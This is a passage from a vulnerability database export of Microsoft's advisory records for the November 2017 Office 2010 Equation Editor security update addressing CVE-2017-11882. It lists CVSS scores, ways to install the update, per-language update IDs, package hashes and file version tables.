href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>eqnedt322010-kb2553204-fullfile-x64-en-us.exe</td><td>F0856A37C414C8E5953BCF3C0D299C72053CD0CB</td><td>D1443883888C39BA42FCECAC4EC8FA1A5EF819BC176A209DFEDB3C4967DEBA2E</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x64-zh-cn.exe</td><td>25E3FE752F887E845BB89059DADF647148F53C17</td><td>11ACB21F7B5A77401C9EE9C22ED51F0F20BDB089F3BE46A281DBE5FDC925B301</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x86-en-us.exe</td><td>A45E3A34CC22713D9BB9EC196A44C05CD0A51F16</td><td>A50E99A89B32EC465860F5348F7469F09D24279C0BF6EFBCD7097E2BA51B0860</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x86-zh-cn.exe</td><td>F8489D5D5C95844C643C7F7A2EB011AAFD1D1C8F</td><td>78EA399D1921E04102491D8E412747C5C49BA4F6ECFCD0327EB3176C76FA5644</td></tr></tbody></table><h3>File information</h3><p>The dates and\u00a0times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of Office 2010</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr></tbody></table><h4>For all supported x64-based versions of Office 2010</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr></tbody></table><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-14T00:00:00", "type": "mskb", "title": "Description of the security update for Office 2010: November 14, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2020-04-16T06:54:36", "id": "KB2553204", "href": "https://support.microsoft.com/en-us/help/2553204/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:27:07", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Office 2010](<http://support.microsoft.com/kb/2687455>) installed on the computer.Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home (see [Determining your Office version](<https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/>)).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n \n**Note**: Separate updates are provided for each Office language. See the table later in this section for the list of languages and update IDs.\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011618>) website. \n \n**Note**: Separate updates are provided for each Office language. See the table later in this section for the list of languages and update IDs.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4011618 for the 32-bit version of Office 2010](<http://www.microsoft.com/download/details.aspx?familyid=2237ed4a-a190-40bf-89a7-13670cf5b174>)\n * [Download security update 4011618 for the 64-bit version of Office 2010](<http://www.microsoft.com/download/details.aspx?familyid=6b5ef0f1-7ac5-4669-a063-69dfb6de2d07>)\nThe following language versions are available for Office 2010:**Language**| **Platform**| **Microsoft Update ID** \n---|---|--- \nar-SA| x64| 6f4af645-ca7b-4c70-bd86-ccf60e308f40 \nbg-BG| x64| 1fa89a33-e3c9-45dc-9c49-b6e32c04a92d \ncs-CZ| x64| 230e7994-d7cc-46c2-b03c-6ebc9b848d04 \nda-DK| x64| b49256d5-93f6-4a9c-b1da-ecdd5fc5d03a \nde-DE| x64| eab2a5d4-6940-4356-ad51-90e2f102d2c8 \nel-GR| x64| 2add0785-3c50-438d-8018-6f600cdeed7f \nen-US| x64| c9e35b51-a722-478a-92c5-90fed2890414 \nes-ES| x64| 51761170-e2cc-4de5-a45b-56b47d758e37 \net-EE| x64| 2b8f54d0-e240-48f5-aa06-421652339325 \nfi-FI| x64| 762b1b94-04dd-4132-8a33-f8c9a1766145 \nfr-FR| x64| 320ebf2c-7942-42de-b6db-0aeaebf8e910 \nhe-IL| x64| f683af7a-78d6-43ec-a5fc-9ac9225121d8 \nhi-IN| x64| a188be9c-fd73-4060-8e0b-dfce8cdc9074 \nhr-HR| x64| 71aec5fe-94a9-415f-b84a-d968000140ce \nhu-HU| x64| 90b678dd-ae26-49dd-b69a-342669b1a608 \nit-IT| x64| dea99bd7-6e0c-4806-8d75-2163dd920efd \nja-JP| x64| 99b7623f-b914-4595-a7b1-7381c4ebb586 \nkk-KZ| x64| f6040da2-09b9-4f96-8bf3-845bec77b548 \nko-KR| x64| 6dcbe074-d9b2-4e03-9108-a0d8b3823f36 \nlt-LT| x64| 408f8ca0-f176-4409-836b-29e57a4e680a \nlv-LV| x64| 0f435635-25e3-47a3-bed3-020f15f39604 \nnb-NO| x64| aa939807-28b7-4223-b6eb-4283ca3fc54b \nnl-NL| x64| c4ce6005-0dde-4e84-90bf-bfe35c35c518 \npl-PL| x64| c93a4c7c-2355-4e63-ba2a-f92b60fc2924 \npt-BR| x64| f4fb7d4e-6756-4811-a326-c07c241e1601 \npt-PT| x64| 19ea1954-00f5-49c2-9b15-a4435c71472d \nro-RO| x64| 209bebf7-f2aa-463c-9b77-689fbf4b9ae0 \nru-RU| x64| d539139d-1e2a-46d9-865f-688d871e59d0 \nsk-SK| x64| acf97ed5-c4f6-4543-8c2d-9a0c22043fef \nsl-SI| x64| 5727f9ab-b034-48ba-a6ed-d80dbc45b4d1 \nsr-Latn-CS| x64| 13a2149a-4d3a-4f59-a325-0f240814c719 \nsv-SE| x64| ed9cfead-3901-4bd4-b9b8-68c7d3f331e9 \nth-TH| x64| 319c6026-f7ed-480f-83ad-76da45f833b4 \ntr-TR| x64| 6e6d0e8c-fdf4-4b23-8473-5e15d20f35d6 \nuk-UA| x64| d810c62b-72b1-489a-a569-7393d108febc \nzh-CN| x64| 8d4c4708-d10c-4cb1-82a8-7872d5b42520 \nzh-TW| x64| 89d72c6f-7b60-4bd1-b0e3-991b74e40faf \nar-SA| x86| 36e0cc27-377b-41e7-9345-c7018a2ea25a \nbg-BG| x86| fc2aa7b3-f147-4120-8205-27dc9c0fc745 \ncs-CZ| x86| 0188c2ec-0f53-469c-8f71-5afd6bfc8461 \nda-DK| x86| ab62f1ba-14f8-48f8-9779-4626e6851b09 \nde-DE| x86| 5457fc20-78aa-498a-b7e9-1d033ece4a81 \nel-GR| x86| 40bd218a-a1b1-47fd-b80b-13db51b826c5 \nen-US| x86| 8b8bd360-565e-48c6-a7ab-849048149845 \nes-ES| x86| 8a9c7e26-92e5-4c50-98c0-96e8cab913c9 \net-EE| x86| 6fecdcd7-ef63-4824-a9a1-44153e6b3399 \nfi-FI| x86| ead0472a-6145-4806-994e-2ea15e5655d3 \nfr-FR| x86| 44a6c00d-fdb7-479a-b6de-32f2029fb4f6 \nhe-IL| x86| df8c5dd6-e7df-46f6-bab1-e8b27554284d \nhi-IN| x86| 26900c32-1600-45b7-9215-17ff44b3b4fc \nhr-HR| x86| a2c657a0-4938-40cc-a569-3cab8e1e000e \nhu-HU| x86| 13fc8588-812c-4f12-814b-c252a325fcbf \nit-IT| x86| 52af3113-2633-4781-94e4-b5fee8b0eb23 \nja-JP| x86| 48a9a078-c385-468a-bd33-f0c397a24777 \nkk-KZ| x86| d911089c-28b6-48ab-8ba2-247e0cf5e4c1 \nko-KR| x86| e9a36679-bcfe-46c1-a1bb-752118602311 \nlt-LT| x86| eee1039c-c663-433d-a207-2729201ba8b2 \nlv-LV| x86| 5a940649-004c-4088-ad36-f7e3e377edea \nnb-NO| x86| aeec1521-1a02-4ec0-a05c-ea477b1393a0 \nnl-NL| x86| 14724059-aa26-4a10-ba95-60d1b8790391 \npl-PL| x86| 858e443d-5815-4572-8f6e-d0b5aef379fb \npt-BR| x86| 61393309-f339-4388-b666-d2d21d70b278 \npt-PT| x86| da13e485-b8cc-4dbf-a294-d8427ab6b2c3 \nro-RO| x86| f7a7a0c9-1e6d-4c7a-a376-81a7fd854d26 \nru-RU| x86| 242f6092-a5fe-4cef-8e52-c90afe35b079 \nsk-SK| x86| bd672718-7e54-4af1-9d58-7e2c19472a68 \nsl-SI| x86| 690ab4eb-8323-43e4-a262-46c2bb4efd71 \nsr-Latn-CS| x86| 082c5509-c18f-4dbb-bbc2-df45363abf1d \nsv-SE| x86| f96bc680-fcc5-4900-88c4-a66412cf615b \nth-TH| x86| c8b92cdc-be78-4958-801f-09a74953d83c \ntr-TR| x86| f2cc89c9-f7ce-416f-bac2-ea3111ed2425 \nuk-UA| x86| 457a68f8-ea5a-4319-9ac3-19f1d2afad58 \nzh-CN| x86| ecd2446d-f25b-4269-9d7f-71b786e68ff1 \nzh-TW| x86| 3a7aa16e-4a72-477b-8aca-4d5abb0e3b3c \n \n## More Information\n\n### Security update replacement information\n\nThis security update replaces [KB2553204](<https://support.microsoft.com/help/2553204>)\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: November 14, 2017](<https://support.microsoft.com/en-us/help/20171114>)\n\n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>) \n \nSecurity solutions for IT professionals: [Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<http://support.microsoft.com>)Propose a feature or provide feedback on Office: [Office User Voice portal](<https://office.uservoice.com/>)\n\n## File hash information\n\nPackage name| Package hash SHA 1| Package hash SHA 2 \n---|---|--- \neqnedt322010-kb4011618-fullfile-x64-ar-sa.exe| 59E1467141F90F1FA287994E8652CE4547578F01| 76405545FA37ED084E6BC0C724B9BF86C25F4F5981B06D14E9D469A7D892AA63 \neqnedt322010-kb4011618-fullfile-x64-bg-bg.exe| 451B9668D76DEDC69AE8B539C3BB84190930382F| 76595A8042E4AACA37FD5BCEFB093A445F9DB50588A1AAF4A47B618A5833062C \neqnedt322010-kb4011618-fullfile-x64-cs-cz.exe| DD01290B53034BF7AD5671262BA0A46407BF856C| B57E3581EA4F485A75D70F807CBB4629963968A26F4217EC191386E824F86A2A \neqnedt322010-kb4011618-fullfile-x64-da-dk.exe| 2D3747C972898DE66A6265A4C11464D96E78C06D| D9605A308191D6F29765A53FA797EDA212AB97A72D8C91C385A9371D5FBC3C45 \neqnedt322010-kb4011618-fullfile-x64-de-de.exe| 7078E576C7C6C9FE6534DF2D576D533D1AD75AE0| 1840B0F7178971BA1E1E692A0E205B5198C2BC798509A95AF98F5C039E62513B \neqnedt322010-kb4011618-fullfile-x64-el-gr.exe| F01CCB25F33FAE6CBE715833651BCC22B9D21EE1| 9E985401B3A48FDB18AE838D833FB1FB630B5BAA9324BD53C36B19FF87697B1E \neqnedt322010-kb4011618-fullfile-x64-en-us.exe| 36DABF913D3F092DDE2458AD38A87D67DA492072| D441DD983E40F81CFCFF3181220BAEE025D4B6957A7B62277B684EFF49523824 \neqnedt322010-kb4011618-fullfile-x64-es-es.exe| 48A2F5F31338F81AC5E2A76838465D79862B0447| 1FC9603851348661E8AAA0026310BD5EFD6715A2ADA2A3598172E54215FFC592 \neqnedt322010-kb4011618-fullfile-x64-et-ee.exe| 093500F1A3834F3814382BE08A3EB9B6E8F9DF47| E3977A0ECC44CF2D213AA08C1B2DAAF826853BAB2BB3F03F2CC1014B748BA824 \neqnedt322010-kb4011618-fullfile-x64-fi-fi.exe| 0C8BF127095AC290AFDFEB0B7A6BEE20A70CFC5B| 15779B184A7EA47E3BDAD9297ADE77475CCFB60F52B565777B79AF20260184BF \neqnedt322010-kb4011618-fullfile-x64-fr-fr.exe| 971999DCB683B75FF0DDD6A451295EBD7CA83149| 70718FCF5C73C6E1E8EA88A00675E7D6A81CA816C117E6162B14691A710E5487 \neqnedt322010-kb4011618-fullfile-x64-he-il.exe| E915952623DE5988C6000AD74D4C6942DCDE8656| 04059D9E936009972E2BD58FCDDD1D68B13705E12381321092899697B0DB90F7 \neqnedt322010-kb4011618-fullfile-x64-hi-in.exe| 35DFB0BB09BF1C214505C023CC8876503554D943| 9BB2A74642984D49E5A7CFB970A3A73AD3C48BD6399E122E92F1861EA01FED37 \neqnedt322010-kb4011618-fullfile-x64-hr-hr.exe| 1C155D4FB0F69FCDBBBA283B6AF1589141677127| A0A2BBF48BD30A115ED23EC4BE24AB2AB79E9813F71369B64DACCFE11B44B4D9 \neqnedt322010-kb4011618-fullfile-x64-hu-hu.exe| 8611B82C873D9DFC44267AB4D5BA3BFF9014004A| 3EFF9198D75EA3F257C05BC10B837F7D7F741C45A7681A3BE452DAE1781F368D \neqnedt322010-kb4011618-fullfile-x64-it-it.exe| F54ED16E66AAE078255219D0FCAB3322B5FFF91A| 3B14C39E77819F2F78E331495166A309182AF153195DAABEC3D322E6BE3666F5 \neqnedt322010-kb4011618-fullfile-x64-ja-jp.exe| 887811D8E6A90223DA819E9C5BEB121CF0D1F6B4| 3399E1FEA06B872DCACD26DA0B1A34BED2A38000B38C66356DD07EA01A1C8040 \neqnedt322010-kb4011618-fullfile-x64-kk-kz.exe| 9C16FCBD5CD765038D201137B10895879744335E| 8C6ADDE77D4D2E7431D29C6CBC155EFF51DF046C70553C853CE6E5FFE6CDE5A1 \neqnedt322010-kb4011618-fullfile-x64-ko-kr.exe| B79A0DA26BB378BD3BF90FED71B0CB8BBBCDDC51| 64205370DE896124FEECD638A40855D997F26851137D09FA6418C7B52055F6C8 \neqnedt322010-kb4011618-fullfile-x64-lt-lt.exe| DAB97AEF6566C8C2A9CE270593ECBEE7706C8A15| 9310F3814C1B06C107B50AB4FE3AA894F2CED97355FCD05B93CE9058CB050D5D \neqnedt322010-kb4011618-fullfile-x64-lv-lv.exe| E1ACCA14132110F67D85467E5013D1BC80577D89| 8B12954856CFCAC46FB4A97B8759B96ED566722C0B754863ECFE15B6FCAB395C \neqnedt322010-kb4011618-fullfile-x64-nb-no.exe| 1B3E54758F9BC540DA71E8C94C7DD75FC7A9E3E5| 87AE7BAF291697D02717A18A53BCA56EC971436021097A15A65E749A06D3D5DA \neqnedt322010-kb4011618-fullfile-x64-nl-nl.exe| 9AC48A233453E283E00C1FE77F0E26A6A2BE7537| F0B93BE2FC004C95114104F65805026A97DD139BA0F75CA7AFC9ADC6CCF76540 \neqnedt322010-kb4011618-fullfile-x64-pl-pl.exe| 503EA5BDC3C91680489322461109163F100B27DB| 0B2D427A2DA9A57F40208E3A0402766CDDE6EEE9019FB74E09F00A758DCE2623 \neqnedt322010-kb4011618-fullfile-x64-pt-br.exe| BBD645D66CC040090C1505AA06381049B77F3055| 1A77E3D22A1FA94B4B498E82A64CFC8C3AEF4962F64FD7F34E0EC375B4047ED1 \neqnedt322010-kb4011618-fullfile-x64-pt-pt.exe| C2104B99090916314754B600665B79DAB1639B4B| FBB5B3D597D350DE633DA801975413EDCB0C51BC3276AAE2C6882B19EDA146F0 \neqnedt322010-kb4011618-fullfile-x64-ro-ro.exe| 17F63000291C55ECB9F8D266E07CA3F3B99AF91A| 1E8E0BEC7CC8FD424CE87BAE084F8FB3EB6045BD95856563949D271E9891610F \neqnedt322010-kb4011618-fullfile-x64-ru-ru.exe| 9F3A7056E839CF4E1137493C3514D848AD2DDC4F| 94D29A0218D53257B5D00AF87F69AD05E1DCA506D4AE5D51DCD32BE59834FB71 \neqnedt322010-kb4011618-fullfile-x64-sk-sk.exe| 2A1EADCBF98E50175E1BE9DD7940FAB9F49A629E| 554244AB6E7E10A7580F3D446E47FEAE85A4722DA530313D5ACB5BD2C0482177 \neqnedt322010-kb4011618-fullfile-x64-sl-si.exe| EC6E77441662AD207FD7026602B04F85D0C32FAE| AAE96522DF0EA4B3796CC51EDBBBD42AEB804706968986C0572E61416ED8A063 \neqnedt322010-kb4011618-fullfile-x64-sr-latn-cs.exe| A2CE588D1DE0DE6E2485E6572B7AAB96106E754C| 630F6E5922672C5F866BCD09A61A9DAF92D987AAC3B25B0B83FC78EC701F57AF \neqnedt322010-kb4011618-fullfile-x64-sv-se.exe| 25D6A6D341E8D764018D69039B01DC57D896CFD0| 64C3EF670DA02EEB477E16662B0BAB0E24054F348C7462D356CF82BEE374E736 \neqnedt322010-kb4011618-fullfile-x64-th-th.exe| 39342821C3D117804BC158DA4CDB92DE3CE5F4D9| 9C6B8FE50A9111D3DE22E8897B1AA56498D7C68A7FFD6216BB01D0F56D81176A \neqnedt322010-kb4011618-fullfile-x64-tr-tr.exe| 5F501995026722A6DB1EAAA0B83CC2A7231326CD| B3271CECA9AD212B3435BF4F97A1E292B53A91B4A7235B259F5CE53327152006 \neqnedt322010-kb4011618-fullfile-x64-uk-ua.exe| 30E1828C66ECAAB1CAACA8C7362B5241D639E4EE| D4F2287B04ACA3CFDD94770DBD410E1EA5FFE83684997E751A640F376860987C \neqnedt322010-kb4011618-fullfile-x64-zh-cn.exe| 32ADD39324AF87A10A70F1F73BC61CDECFC7E7B4| 3FFCBA2C30648ADD343E62636291B1DD341F32E5458A1AE6709EF80434AB3EE1 \neqnedt322010-kb4011618-fullfile-x64-zh-tw.exe| B8DC90008177017CD34FD29B7B4F5FBC2E0EC0AA| CBEC6F0D36155BCF3D2E4AA2D857EAFA3CA323EA4A7027A956B95AA7AAC42BE0 \neqnedt322010-kb4011618-fullfile-x86-ar-sa.exe| A044BC142F8D695D3164A7C0F6A4760D01DBA663| 2D54409F99170157E011D1EC2339F65DDF002D16B5F37C9C3998A944B4E27C8C \neqnedt322010-kb4011618-fullfile-x86-bg-bg.exe| 638823B68FD6FF2E7B5252109394A752073ED2C6| 2056B8BC886717DE4B4C1A34558D41C2A8AB92BEEFD7260D1917E61CDA1EF257 \neqnedt322010-kb4011618-fullfile-x86-cs-cz.exe| 1E5C2C7C63D545AE6839796871F032956F723BE9| 5CA9CCBEE029BFBA0DB16B3889760028C6BBD5049B22D653FCB02CE514AE1A34 \neqnedt322010-kb4011618-fullfile-x86-da-dk.exe| 81B3516B787CD933FE01FB11F147592952E5899D| 1A0F4B28C19E5CF6C8F5F428D26FDF139F15948FBC33F365F2631F1411947243 \neqnedt322010-kb4011618-fullfile-x86-de-de.exe| FC424F2D5E7C111697091F82658CAB280774F14C| CD873FC1B48E30AC3B9A6DA952C6882A963300365A44F8C8DDA4032432F5898A \neqnedt322010-kb4011618-fullfile-x86-el-gr.exe| 723A17BE82B8AE7CF1B4BE1AB8CF9F7B946023DC| 30282A49E3B390A3A325357820C1AD447A8F2E4AF430A82A50D62C1BDAD6DA4E \neqnedt322010-kb4011618-fullfile-x86-en-us.exe| 0D04B56BE33B9DD3DF6149CB55E29990AD764F2D| DB9CB1C80F4AFDE5F852946D258040DB42D47D5258524D279D79A76AAAA16DAD \neqnedt322010-kb4011618-fullfile-x86-es-es.exe| 68F0B54AA83256D58E617DC63EE28F564639FF14| D2EA3FE8D84596CE278BFFB6B3A8593515EB3B7941DB1334450014160628E870 \neqnedt322010-kb4011618-fullfile-x86-et-ee.exe| 8C368752DB8E4C7945A1B5A1ADC2F7B6EE9F76DC| 2D4A0146E2B629C8F89DE965723F783D7ABB9BFFE13974E5C6947232C185D401 \neqnedt322010-kb4011618-fullfile-x86-fi-fi.exe| 5F6D036FE4DBB66D352F928B462D59A58B6D13B7| F1897B570D70822DFA8812454AAEFCC6770CDB73186BA6D8262C6E8A9C3E7531 \neqnedt322010-kb4011618-fullfile-x86-fr-fr.exe| 8501902B0F9EBE4E63FAF83F977195FB67F296CA| BB8677B0A2B73ED8A03408A7F6E14B6E714A20C64A9E08FDE3139E32CCAC7714 \neqnedt322010-kb4011618-fullfile-x86-he-il.exe| 650BF0033D58EC14A9A9643848EB3901BBAC0975| 014305F7CBDA595C989B9355FF6845BA77C0A57FC537D79F51DB62D2F806B1F3 \neqnedt322010-kb4011618-fullfile-x86-hi-in.exe| 667893DF4DB4C308CEE6EBAAAF536143ADB5BD75| 60D3CD80A2DFF472422C7DAEFAEBA1E89964FAD24558092919DE3B05120FE132 \neqnedt322010-kb4011618-fullfile-x86-hr-hr.exe| 00F6FBF5D8E292CE10B63DED8B097CE6E2B60319| A7E6CE428B0EC8B8B4A737D1EDAB3E9C553B12D4A182F635339A7DB956C33B88 \neqnedt322010-kb4011618-fullfile-x86-hu-hu.exe| 2E883ED146C3851A826F762C80E0195AF9095CD8| D10289C57D60B41A3D7298DC46DBAAB0B386B4EE3E056E21681B879A41E05BB6 \neqnedt322010-kb4011618-fullfile-x86-it-it.exe| DD7822ED4E65AA5BEB192AD4308DFDBCD74E006E| F2720040D02298E5475CCFBD64DBC4F47E1229225ECBB52F354B1D7ADE1ABAFC \neqnedt322010-kb4011618-fullfile-x86-ja-jp.exe| 820DD332C83F6A4536BA56549BF2CDB49EE21ED5| 418DBCADD9D0102ADE59628B04BF4B2035856F92FEF5AA41B3F5F7878153FD23 \neqnedt322010-kb4011618-fullfile-x86-kk-kz.exe| 7E180393FEECFCEF9D6D187D667798A564B51ECE| A10245848B7236EAF1921A3FFAB700A6851AE2A5ED9C0F7D6A0027B95F5F6A36 \neqnedt322010-kb4011618-fullfile-x86-ko-kr.exe| A56A1D221D97C689BC1B0B9B4B6F025E9B24058E| 216A262DE0E394DE6FE8382D1F6C200F44DD65FB5A8C2A4054EDCAAA0CA12614 \neqnedt322010-kb4011618-fullfile-x86-lt-lt.exe| 05DCA752D2A3365A6A802FA80EC6D0003CD66203| FD498D244A2071268E97425A8157BAF8C22E7F3306131597F3EDD45868E2CD43 \neqnedt322010-kb4011618-fullfile-x86-lv-lv.exe| 7AF3237394C03CD41998EDA6095C252A389A13FA| 9839E8BE00B8DF4B21775E0195BD310E351E463ECAAFE78B3DDD22DED3F95ACF \neqnedt322010-kb4011618-fullfile-x86-nb-no.exe| 2B1251DB11B4BF548FD077070BCC07CA84FD36F1| AFE6B1AAFD5F538B274B8296A9931C2956B87C13CEA0D1BD0B8892C0864123D9 \neqnedt322010-kb4011618-fullfile-x86-nl-nl.exe| 9F9C17851FF19FBB54193EFF66336A55F3A5D718| 11AD22183223D9BFA51621B0ABE2C3B806A6159910309F80281A655418CB634C \neqnedt322010-kb4011618-fullfile-x86-pl-pl.exe| F2EC8832FEA1EDEDED4AB8928882E422E91B81A3| 011DCC759E26874093C91D7E855BDAB6152BEF21E2D99A2EE24E5D0C96313919 \neqnedt322010-kb4011618-fullfile-x86-pt-br.exe| A58430F4B109B606AB27B8FE71FD84C02E11D82C| 26CF8F23A3AA270B62B303AB930235DF8E908B0B15D23BC06841C559DFE89DC5 \neqnedt322010-kb4011618-fullfile-x86-pt-pt.exe| C0E91D030D79A5D94AEBA078591A70D870B4701A| 48C97738174AFF3A6B0A9848BF8C8906F342057B86CAC0114DD9BAB71DBD939D \neqnedt322010-kb4011618-fullfile-x86-ro-ro.exe| 9842AA3C6AC426D8784F79DA5878CE1D90A1E02A| 819F7D7DACF85A67250308E4A84B8424DD5164AC3B27C8B9339118746D472F5A \neqnedt322010-kb4011618-fullfile-x86-ru-ru.exe| 8F16BED370ED6F5DE15B28B8212DAB7D30FF2D9F| E9E86D024840CF29B8078458F5CA7564292457DD29A6732CA19B6A466A735156 \neqnedt322010-kb4011618-fullfile-x86-sk-sk.exe| D1F041AB16B0C0FB9AF22374BE280B85CD91DB2F| 7D90049677AAC8AC56FCEAA32B9C472DF9DC77C2C5E8D87FA0D63F43EADB24EB \neqnedt322010-kb4011618-fullfile-x86-sl-si.exe| 8E23C12C534CF7A05FC050F761073734D336791E| 3F17B71960E126DEE3AE4EA3957D222862A0EC1D3CD02F2D80CD2275B879B469 \neqnedt322010-kb4011618-fullfile-x86-sr-latn-cs.exe| 898568DF9D0EC495EB9EAC104F45FF5317F11BE7| 35F59E51E88EDB025CF8FCE6884D9CF60573DB13F3090860256CD1AE1F12806F \neqnedt322010-kb4011618-fullfile-x86-sv-se.exe| CD07A211A67362D8757569173AA9BFE35D251482| CB4D8B5B4A0C9CAFA5FF727D631A2564C3329F9FCC92AE94519B17054ECF85B0 \neqnedt322010-kb4011618-fullfile-x86-th-th.exe| A06860238BD978CDF96231B42FC048B052FFA4F5| C03359C71EA08361B65AD6159C2A04143F74F65A3877516E0F870A4290A37C2B \neqnedt322010-kb4011618-fullfile-x86-tr-tr.exe| E2D3BB0EAAC40FC5B41CD005064BCC24F02BD53A| 37CB8D8DB5FF283B96073C557EB9D007A72547FF03FFA759536C60C758973F12 \neqnedt322010-kb4011618-fullfile-x86-uk-ua.exe| 188E5BA4609375CBA3202CD7DC14782096A68FD9| 3F865C92075F71B433A646845A2B1D1B5C5F05F34E2A8CE1AA11E8B1EF2B3722 \neqnedt322010-kb4011618-fullfile-x86-zh-cn.exe| 82377EE5E7EE118CC318413BADA037AB6F119EC1| 25B7D366E223F117710B29346263AA4881C3CF7C27CE7B40B2B2C2CACD40AD89 \neqnedt322010-kb4011618-fullfile-x86-zh-tw.exe| 0817B8440F8B05E62A433745703803AB1CA08C61| 990D3C5BC9D1DE12480E2F418C667380B10E8150E40D08725B45C91A9B8E7693 \n \n## File Information\n\nThe dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n### For all supported x86-based versions of Office 2010\n\n**File identifier**| **File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|---|--- \neqnedt32.exe_1025| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1026| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1028| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1029| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1030| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1031| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1032| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1033| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1035| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 